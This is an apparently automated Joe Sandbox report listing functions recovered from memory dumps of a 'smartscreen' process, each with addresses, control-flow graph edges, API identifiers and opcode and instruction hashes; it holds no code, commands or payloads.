                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction ID: d8287f73f67c48242572c84596b29e8831f841b83abbde8c8b56f25c95c7d645
                                                                                                      • Opcode Fuzzy Hash: 0316a038b8e9eb0b2cb2249e16bdb37a1aa7801c468ecbbd39aba21e29c0d2df
                                                                                                      • Instruction Fuzzy Hash: DC517D70D0864D8FDB58DFA8C885BEDBBF1FB6A310F1042AAD448E3251DB74A885CB41
                                                                                                      Function 00007FFD9B8C31BD Relevance: 1.5, APIs: 1, Instructions: 223memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 662 7ffd9b8c31bd-7ffd9b8c31d9 663 7ffd9b8c31db-7ffd9b8c32f3 VirtualAlloc 662->663 664 7ffd9b8c3173-7ffd9b8c31ba 662->664 671 7ffd9b8c32f5 663->671 672 7ffd9b8c32fb-7ffd9b8c335f 663->672 671->672
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c1000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 15abc859269d467da507f4c194c7f49b627025f35ba53f7c402d2f33296c11c6
                                                                                                      • Instruction ID: ad257a45d92015814eb930fcdedb9c7325fdb717c3a02baa40e49a77bb4909b1
                                                                                                      • Opcode Fuzzy Hash: 15abc859269d467da507f4c194c7f49b627025f35ba53f7c402d2f33296c11c6
                                                                                                      • Instruction Fuzzy Hash: FB614E70908A5D8FDF98EF58C885BE9BBF1FB69310F1041AAD44DE3255DB30A985CB80
                                                                                                      Function 00007FFD9B9011D8 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 675 7ffd9b9011d8-7ffd9b90122e
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2G_^
                                                                                                      • API String ID: 0-3208857883
                                                                                                      • Opcode ID: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction ID: d2f9e31b1170dea2d679410746b1666f5e3cc1fd86fa33d85833eb01e68fb97a
                                                                                                      • Opcode Fuzzy Hash: 38965ee8b88ccab199b3ca1490ea9b7a9fe03a8b6d1faab2de608c4068e608df
                                                                                                      • Instruction Fuzzy Hash: 1F110635A081598FCB0AFF6CE8A59E97BA0EF45318F0440B7E15DC7197DE349942C780
                                                                                                      Function 00007FFD9B8FC45D Relevance: .4, Instructions: 440COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ff391b8e9d5e35da53e0aad51afd4cde15cde0edf2b09fb7f4f3070eab087791
                                                                                                      • Instruction ID: 736d2ec8605f49cab5cb58ea32dd23b18b83c5827941537f7abf68c93003d7e4
                                                                                                      • Opcode Fuzzy Hash: ff391b8e9d5e35da53e0aad51afd4cde15cde0edf2b09fb7f4f3070eab087791
                                                                                                      • Instruction Fuzzy Hash: 54F13D71E19A5D8FDBA8DB98C8657B8BBA1FF58300F4441B9D01DD32A2DA346A81CB41
                                                                                                      Function 00007FFD9B8C81B9 Relevance: .1, Instructions: 141COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 969 7ffd9b8c81b9-7ffd9b8c8204 971 7ffd9b8c820b-7ffd9b8c8211 969->971 972 7ffd9b8c8206 969->972 973 7ffd9b8c82e5-7ffd9b8c82eb 971->973 972->971 974 7ffd9b8c8216-7ffd9b8c824c 973->974 975 7ffd9b8c82f1-7ffd9b8c82fa 973->975 977 7ffd9b8c8252-7ffd9b8c82bf 974->977 982 7ffd9b8c82c1-7ffd9b8c82ca 977->982 983 7ffd9b8c82dd-7ffd9b8c82e2 977->983 982->983 984 7ffd9b8c82cc-7ffd9b8c82dc 982->984 983->973
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction ID: 2e31925a6288af58259525345832f15a3b9c42e1385d9ff439bbb1d26fc4860b
                                                                                                      • Opcode Fuzzy Hash: 5d56722339f73a14b8c7ef1eb29c17ffa6f9285979d6097fec14e01605c0f760
                                                                                                      • Instruction Fuzzy Hash: 9D518F70A09A4E9FCF84EF98D494AED7BF1FF58311F0501AAE419E7261D634E991CB80
                                                                                                      Function 00007FFD9B8F981D Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 985 7ffd9b8f981d-7ffd9b8f9867 987 7ffd9b8f9869 985->987 988 7ffd9b8f986e-7ffd9b8f98cb 985->988 987->988 996 7ffd9b8f98d6-7ffd9b8f98da 988->996 997 7ffd9b8f98cd-7ffd9b8f98d4 988->997 998 7ffd9b8f98dc-7ffd9b8f9bb3 996->998 999 7ffd9b8f98f7-7ffd9b8f9b06 996->999 997->996 998->996 1006 7ffd9b8f9bb9-7ffd9b8f9bc0 998->1006 1003 7ffd9b8f9b08 999->1003 1004 7ffd9b8f9b0d-7ffd9b8f9b1e 999->1004 1003->1004 1007 7ffd9b8f9b29-7ffd9b8f9b41 1004->1007 1006->996 1008 7ffd9b8f9b48-7ffd9b8f9bb3 1007->1008 1009 7ffd9b8f9b43 1007->1009 1008->996 1008->1006 1009->1008
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e643e4daf2208168045a0244a703443c473829ae53abd04b034e77bf122f017
                                                                                                      • Instruction ID: 611893e75cda03b31a699977760e1f3bad0cca6751a19539d9f7ae63cb4454d2
                                                                                                      • Opcode Fuzzy Hash: 2e643e4daf2208168045a0244a703443c473829ae53abd04b034e77bf122f017
                                                                                                      • Instruction Fuzzy Hash: AD517130E19A4E8FEBA4EF54C4A57B9B7A1FF58300F0145B5D019D72A6CE34AD45CB80
                                                                                                      Function 00007FFD9B8B3565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d13e3a78cd8e0f01cffe825a08dbad320095c077a330eaf17e5fd2696555d3fa
                                                                                                      • Instruction ID: d2d5d24e8e62fa76ec0a8ac1eefb0652e6d261b3c661391153044318219a775b
                                                                                                      • Opcode Fuzzy Hash: d13e3a78cd8e0f01cffe825a08dbad320095c077a330eaf17e5fd2696555d3fa
                                                                                                      • Instruction Fuzzy Hash: 5C51BC74E0952D8EDBA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DF386A84CF45
                                                                                                      Function 00007FFD9B8C7E49 Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d65cd88c79d6e67e0abd5513706483cdafee3299264d19c2fb2ab32d4f5b970
                                                                                                      • Instruction ID: 5a80234903b67c9abcad80f2f1d0b9116f4e59a7f6a0b0c7faf6325caed9ff9d
                                                                                                      • Opcode Fuzzy Hash: 6d65cd88c79d6e67e0abd5513706483cdafee3299264d19c2fb2ab32d4f5b970
                                                                                                      • Instruction Fuzzy Hash: 5F317A75A0964D8FDB55DF58C8A5AFE7BB1FF48300F06026AE849E3291CB34AD40CB81
                                                                                                      Function 00007FFD9B8FABDF Relevance: .1, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa6b1ac020eb300a68ed92ee69d617d2bfc2132ce46ce9cbe73a7089820a2ea1
                                                                                                      • Instruction ID: 99b930567e970da0e260fc30a2dd3a15be6015a9368d5b0a7dad74a716945804
                                                                                                      • Opcode Fuzzy Hash: fa6b1ac020eb300a68ed92ee69d617d2bfc2132ce46ce9cbe73a7089820a2ea1
                                                                                                      • Instruction Fuzzy Hash: 5D314270F0965D9FEB74DB84C865ABCBBB1EF58310F1501B9D449932A1CE386E818B41
                                                                                                      Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2c09b972a903531dccbeb283c42855e94120ef3c91dce3767785bd7e863a92d6
                                                                                                      • Instruction ID: 3a02d9aa6f60225995aaf4f453e8e2a8e7747ba6f73987135b4c35a40664b863
                                                                                                      • Opcode Fuzzy Hash: 2c09b972a903531dccbeb283c42855e94120ef3c91dce3767785bd7e863a92d6
                                                                                                      • Instruction Fuzzy Hash: 6E21F736B0E29D8EE71297B9DC211ED7B60EF46311F0545B3C044DB1E2D638260ACBD1
                                                                                                      Function 00007FFD9B8B35FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c30593aa1ed19d4ba1893f31799d0f5434edfebb24f272d2ac1f840f45d78636
                                                                                                      • Instruction ID: bacccaa8dd8ed32ed8848064e98980059c7b0c8c1e16876fd07b3447aa5db671
                                                                                                      • Opcode Fuzzy Hash: c30593aa1ed19d4ba1893f31799d0f5434edfebb24f272d2ac1f840f45d78636
                                                                                                      • Instruction Fuzzy Hash: 5431BB31E0892C9FCF94DF14C895AE9B3F1FB69301F5011DA900EE3265DA75AA84CF42
                                                                                                      Function 00007FFD9B8B36E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f946a6a6e34bd3121d574ed1ab5c850beb53daa148ba01d702451c4e09d4d691
                                                                                                      • Instruction ID: 485db74f19de02fb5b6b3e184f17b0dd60bb63011e2f794c5cabaab74024ac84
                                                                                                      • Opcode Fuzzy Hash: f946a6a6e34bd3121d574ed1ab5c850beb53daa148ba01d702451c4e09d4d691
                                                                                                      • Instruction Fuzzy Hash: D3319C31E0852C9FDBA4DF14C895AE9B3F1FB69301F5041EA900EE3265DE75AA80CF42
                                                                                                      Function 00007FFD9B8B11A2 Relevance: .1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 167c99d6509c0b510ce788340d53953fb934173cf88276d1699d4fa6fb2410db
                                                                                                      • Instruction ID: 4c604ba888f46a04f9aa176768432f3b932ea61004baef93f04f33390b4205ee
                                                                                                      • Opcode Fuzzy Hash: 167c99d6509c0b510ce788340d53953fb934173cf88276d1699d4fa6fb2410db
                                                                                                      • Instruction Fuzzy Hash: BA212C30A2491E8FEB94EFA8C8949ADB7F1FF58300B11057AD419D72A1EF34A941CF80
                                                                                                      Function 00007FFD9B908BC9 Relevance: .1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c3c4b86fcaeb77450fc974d95203254b674adbbb1691a0e69b4d2570eff6d516
                                                                                                      • Instruction ID: cb784f08d2b6c1b278ba6450e6efba3dc8ca89df0c715633ad7599d2473e0962
                                                                                                      • Opcode Fuzzy Hash: c3c4b86fcaeb77450fc974d95203254b674adbbb1691a0e69b4d2570eff6d516
                                                                                                      • Instruction Fuzzy Hash: AA21C175E1A64D9FEB91EF6888A96F97BF0FF15300F0104AAD458C71A2DE34A640CB01
                                                                                                      Function 00007FFD9B8B0C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2323038cf80f93fd5bab0d795b7440a1d323284a078f9fbb837bb010fffee70d
                                                                                                      • Instruction ID: e612c87ad5ad3cade6c352565c881be967e1b10b2ce6f863f1667d4464913a56
                                                                                                      • Opcode Fuzzy Hash: 2323038cf80f93fd5bab0d795b7440a1d323284a078f9fbb837bb010fffee70d
                                                                                                      • Instruction Fuzzy Hash: A811D331A1E6AE8EE7129BB9CC311A97760EF46710F064573C044DB1E2DA38660A8BD1
                                                                                                      Function 00007FFD9B8BFD6B Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 61327f838e2b9e8250deadaf2545d99eae9ab8515fea475b424ad1996bb1c087
                                                                                                      • Instruction ID: 3e0b8cbc913104e61c5497c50fc05e50deaba5a361f271f39a53f29f531836de
                                                                                                      • Opcode Fuzzy Hash: 61327f838e2b9e8250deadaf2545d99eae9ab8515fea475b424ad1996bb1c087
                                                                                                      • Instruction Fuzzy Hash: 1A117730A0962D8FDFA9DB58C895AA8B3B5FF58301F5141E9E00DE7691CB31AE81CF40
                                                                                                      Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: feb93b1ed71b3f4521d9489d252161c209af2c1b3ad6392fb1d5a30f7f35d077
                                                                                                      • Instruction ID: 32dd725e3b6804df6d6e17dfca4d5e35efe63d97be6c687a1608b015e4431833
                                                                                                      • Opcode Fuzzy Hash: feb93b1ed71b3f4521d9489d252161c209af2c1b3ad6392fb1d5a30f7f35d077
                                                                                                      • Instruction Fuzzy Hash: 1711C131A1E6AE8EE7129BB5C8351A97B70EF46710F0645B3C041DB1E2CA386609CB91
                                                                                                      Function 00007FFD9B8BFDE5 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 021a0111c3332d724e762ab28dc9dfcdf6bd0723c29cdd66bdbe3b2952659963
                                                                                                      • Instruction ID: b756ac3df90f9aad29212e3b9069b12057ba0ad3bdbbfd79a56c2a01165465bd
                                                                                                      • Opcode Fuzzy Hash: 021a0111c3332d724e762ab28dc9dfcdf6bd0723c29cdd66bdbe3b2952659963
                                                                                                      • Instruction Fuzzy Hash: 9F217930E0962D8FDFA9DB58C895AA8B3B5FF58301F5141E9E00DD76A1CB71AA81CF40
                                                                                                      Function 00007FFD9B909938 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 896b99a6e80c961fbd9535b53e19b6ec5851497b86b69c22453f3807ecb55ed9
                                                                                                      • Instruction ID: 44e4826c07e057ee474bbb0e1dd05be003c314249c2780847b6838b1157504e2
                                                                                                      • Opcode Fuzzy Hash: 896b99a6e80c961fbd9535b53e19b6ec5851497b86b69c22453f3807ecb55ed9
                                                                                                      • Instruction Fuzzy Hash: DC114935E1D51DDBDB68DB9CD8A85ECB7B1FF58314F11027AC05A932A6DE3469018B40
                                                                                                      Function 00007FFD9B8C783D Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e28cf7751572d6734a93add3794e84968143b51a0ecfe22ed8a8773870b7722c
                                                                                                      • Instruction ID: 50d4d91731716062adc6e1da385d3234b9510eacb0dc46fe86f70f6e45b8c10e
                                                                                                      • Opcode Fuzzy Hash: e28cf7751572d6734a93add3794e84968143b51a0ecfe22ed8a8773870b7722c
                                                                                                      • Instruction Fuzzy Hash: 8D014575E1E60D4FE711AF58D8212FD7BA4EF8A314F420173E208D22D6DA38550AC795
                                                                                                      Function 00007FFD9B8B0C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53581e9f2cbb21ce505c0abf6ebcb3cedad47d06f59af6792329fdeabd1c403a
                                                                                                      • Instruction ID: e814c246d9b8a9720c40422e9e16d67bbdc6467fc0bacc5ce69573d415d11100
                                                                                                      • Opcode Fuzzy Hash: 53581e9f2cbb21ce505c0abf6ebcb3cedad47d06f59af6792329fdeabd1c403a
                                                                                                      • Instruction Fuzzy Hash: 1C11E531E0E29E8FE7129B74CC251A97B70EF46700F0545B3D051DB1E6DB386609CB91
                                                                                                      Function 00007FFD9B905459 Relevance: .1, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b885d5d996437df03cca95172f27c05604fa99b5c46491260025832d668e234
                                                                                                      • Instruction ID: a82470a7fc0a5a73254aa45567ab95deb9d9e3d7845571a03f44cab204bcde07
                                                                                                      • Opcode Fuzzy Hash: 9b885d5d996437df03cca95172f27c05604fa99b5c46491260025832d668e234
                                                                                                      • Instruction Fuzzy Hash: 9D11F734908A8D8FCF85EF68C899AE97BF0FF29305F0105AAE419D7261DB74D954CB81
                                                                                                      Function 00007FFD9B8CF8B9 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8ca000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7b9e870afd1fa159ee978a7db1a8e83f476a895203b93013cc9d047e145e5dfe
                                                                                                      • Instruction ID: 6c9d1632438eee7c174057a2f682d94ba705bd2b2633a96de141d18d4ec3fb04
                                                                                                      • Opcode Fuzzy Hash: 7b9e870afd1fa159ee978a7db1a8e83f476a895203b93013cc9d047e145e5dfe
                                                                                                      • Instruction Fuzzy Hash: 24113930908A8D8FDF85EF68C859AEA7BF0FF28304F0105AAE418D72A1DB349554CB81
                                                                                                      Function 00007FFD9B8C7FE1 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 608c4ff354dcd1f5481e53d09453fb1b3496d715c1c0d8e592c744119a489ced
                                                                                                      • Instruction ID: c8e40ac4e23a83e1af37b30839b32bd2941b4d31a3409cb2d78316482d2598e9
                                                                                                      • Opcode Fuzzy Hash: 608c4ff354dcd1f5481e53d09453fb1b3496d715c1c0d8e592c744119a489ced
                                                                                                      • Instruction Fuzzy Hash: 1D015674A1968D8FCB85EF18C892AE93BF0FF18304F0601AAE848C7261C734E950CB81
                                                                                                      Function 00007FFD9B8FA2D9 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83dbb3029debb6ef7146d7d04cc800881e3afaba937dc2eb7fd06d78b84d92a7
                                                                                                      • Instruction ID: 942fe7ca2d98e964b0e0c0a72ea6b133233b2db51f710700be5c4e605c3c472d
                                                                                                      • Opcode Fuzzy Hash: 83dbb3029debb6ef7146d7d04cc800881e3afaba937dc2eb7fd06d78b84d92a7
                                                                                                      • Instruction Fuzzy Hash: 4611213090864D8FCF85EF68C859AEA7BF0FF29304F0105ABE459D7161D734A954CB81
                                                                                                      Function 00007FFD9B905539 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a76f504d77e3debe5c20e95fd24a42c3000834352b04d7026acf50c6c90c3dde
                                                                                                      • Instruction ID: 9fa6a46bb73e1b6f596b8194040186943554251831da2aca308f8deb7671a6d3
                                                                                                      • Opcode Fuzzy Hash: a76f504d77e3debe5c20e95fd24a42c3000834352b04d7026acf50c6c90c3dde
                                                                                                      • Instruction Fuzzy Hash: 50111870918A8D8FCF85EF68C899AE97BF0FF28301F0501AAD459D72A1D7349594CB81
                                                                                                      Function 00007FFD9B8BEB8B Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
